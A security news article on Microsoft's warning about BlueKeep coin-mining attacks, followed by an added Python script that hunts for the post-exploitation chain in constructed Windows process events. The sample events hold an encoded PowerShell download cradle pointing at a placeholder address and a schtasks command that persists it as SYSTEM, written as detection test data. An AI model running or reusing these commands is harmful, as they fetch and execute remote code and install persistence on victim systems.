Organizations are once again being warned to patch the BlueKeep remote desktop protocol (RDP) flaw reported by Microsoft in May 2019, after hackers were spotted targeting the vulnerability to launch cryptocurrency-mining attacks. The tech giant warns that these early attacks are just a sign of what’s to come.
In mid-May, Microsoft issued a rare patch for a handful of legacy operating systems that are no longer serviced by the company. The vulnerability (CVE-2019-0708) sits in Remote Desktop Services and is reachable before authentication: an attacker who can connect to the RDP service over the network sends specially crafted requests and can execute arbitrary code, including malware, on the target without any valid credentials.
Like the SMB flaw that WannaCry exploited in May 2017, BlueKeep is wormable: because no authentication or user interaction is needed, malware exploiting it could spread from one vulnerable machine to the next on its own. The hope was that organizations would patch quickly enough to prevent another global outbreak.
However, despite an alert from the National Security Agency, security researchers demonstrating the severity of the flaw, and a repeat warning from Microsoft, 800,000 devices were still unpatched as of July 2019.
Microsoft’s latest warning follows reports that security researchers discovered the first malware campaign weaponizing the BlueKeep flaw. Many researchers initially judged the attacks to be low-impact: a crash-prone exploit dropping a coin miner fell well short of the WannaCry-like event the repeated warnings had anticipated.
According to Microsoft, the attackers hit an RDP honeypot run by security researcher Kevin Beaumont, and the exploit attempts caused the honeypot to crash. The tech giant worked with Beaumont and another researcher, Marcus Hutchins, to investigate and analyze the event.
The team extracted indicators of compromise and other signals and found that an earlier coin-mining campaign in September “used a main implant that contacted the same command-and-control infrastructure used during the October BlueKeep Metasploit campaign, which, in cases where the exploit did not cause the system to crash, was also observed installing a coin miner.”
The shared command-and-control infrastructure makes it likely that the same actors were behind both campaigns; the October campaign used the public BlueKeep Metasploit exploit module. Attackers exploited the RDP flaw to download and execute obfuscated PowerShell scripts, which installed the coin miner as the final payload and created a scheduled task so that it would persist across reboots.
The researchers concluded that these attacks are just the beginning: the attackers will refine their techniques to make the exploit more reliable, and organizations and other users should not delay patching the vulnerability.
“Security signals and forensic analysis show that the BlueKeep Metasploit module caused crashes in some cases, but we cannot discount enhancements that will likely result in more effective attacks,” Microsoft researchers wrote.
“While there have been no other verified attacks involving ransomware or other types of malware as of this writing, the BlueKeep exploit will likely be used to deliver payloads more impactful and damaging than coin miners,” they added.
Microsoft warned that BlueKeep will remain a threat for as long as organizations leave systems unpatched. Beyond patching, organizations need sound credential hygiene and an overall solid security posture, and should deploy behavior-based antivirus and endpoint detection and response (EDR) tooling to catch post-exploitation activity. Where patching is delayed, Microsoft’s advisory for the flaw also lists enabling Network Level Authentication (NLA) as a mitigation, since it forces authentication before the vulnerable code path is reached, and blocking TCP port 3389 at the network perimeter.
Many of the unpatched devices may also sit unmonitored with third-party vendors and others along the supply chain, a particular weakness of the healthcare sector. Microsoft also published a threat analytics report to help security operations teams investigate BlueKeep activity, along with advanced hunting queries.
“Because BlueKeep can be exploited without leaving obvious traces, customers should also thoroughly inspect systems that might already be infected or compromised,” Microsoft wrote.
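The post-exploitation chain described earlier (obfuscated, encoded PowerShell fetching a second stage, then a scheduled task for persistence) is what a security operations team can actually hunt for, since the pre-authentication exploit itself produces no logon event. The following is an added example, not Microsoft’s hunting queries and not code from the campaign: a small Python hunt over constructed process-creation records in the shape of Windows Security event 4688 / Sysmon event 1. The hostnames, the download cradle, the 203.0.113.10 address and the task name are all invented for illustration.

```python
"""Hunt for the BlueKeep post-exploitation pattern: encoded/hidden PowerShell with a
download cradle, followed by a scheduled task that re-runs PowerShell as SYSTEM.
Added example; all events below are constructed, not real telemetry."""
import base64
import re
from collections import defaultdict

# Constructed stage-2 cradle (RFC 5737 documentation address, not real infrastructure).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')"
# powershell.exe -EncodedCommand takes base64 of the UTF-16LE script text.
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed records: host, parent image, image, command line
    {"host": "RDP-SRV01", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"host": "RDP-SRV01", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": f'schtasks.exe /Create /SC MINUTE /MO 30 /TN "WindowsUpdateCheck" '
                f'/TR "powershell -nop -w hidden -enc {_ENCODED}" /RU SYSTEM /F'},
    {"host": "FILE-SRV02", "parent": r"C:\Windows\explorer.exe",   # benign admin use
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"},
    {"host": "FILE-SRV02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks.exe /Query /TN NightlyBackup"},
]

# Any '-e...' switch followed by a base64-looking blob; the prefix is validated below.
_ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")
_CRADLE_RE = re.compile(
    r"(?i)(invoke-expression|\biex\b|downloadstring|downloadfile|net\.webclient|"
    r"invoke-webrequest|\biwr\b)")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if there is none.
    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
    so accept every '-e...' switch that is a prefix of the full name and reject the
    rest (e.g. -ExecutionPolicy)."""
    for m in _ENC_FLAG.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(flag):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def indicators(event):
    """Map one process-creation event to the behaviours of the described chain."""
    cmd, image, parent = event["cmdline"], event["image"].lower(), event["parent"].lower()
    found = set()
    if image.endswith("powershell.exe"):
        if re.search(r"(?i)\s-w(?:indowstyle)?\s+hidden\b", cmd):
            found.add("hidden_window")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            found.add("encoded_command")
        # Look for the cradle in the decoded script (obfuscated case) or the raw line.
        if _CRADLE_RE.search(decoded if decoded is not None else cmd):
            found.add("download_cradle")
        if parent.endswith("svchost.exe"):
            found.add("service_spawned_powershell")  # weak signal on its own
    if image.endswith("schtasks.exe") and re.search(r"(?i)/create\b", cmd):
        found.add("scheduled_task_created")
        if re.search(r'(?i)/tr\s+"?[^"]*powershell', cmd):
            found.add("task_runs_powershell")
        if re.search(r"(?i)/ru\s+system\b", cmd):
            found.add("task_runs_as_system")
    return found


EXECUTION = {"encoded_command", "download_cradle", "hidden_window"}
PERSISTENCE = {"scheduled_task_created", "task_runs_powershell"}


def hunt(events):
    """Correlate per host and flag hosts showing both the execution stage and the
    persistence stage; either alone is common in legitimate administration."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]] |= indicators(ev)
    return [{"host": h, "indicators": sorted(i)}
            for h, i in sorted(per_host.items()) if i & EXECUTION and i & PERSISTENCE]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["host"], ", ".join(finding["indicators"]))
```

The value is in the correlation rather than any single regex: encoded or hidden PowerShell and scheduled-task creation each occur in normal administration, but the same host showing a download cradle and then a task that re-launches PowerShell as SYSTEM is the shape of the miner deployment described above. On real telemetry, feed the same records from 4688 (with command-line auditing enabled) or Sysmon event 1, and expect to tune the weak `service_spawned_powershell` signal for your environment.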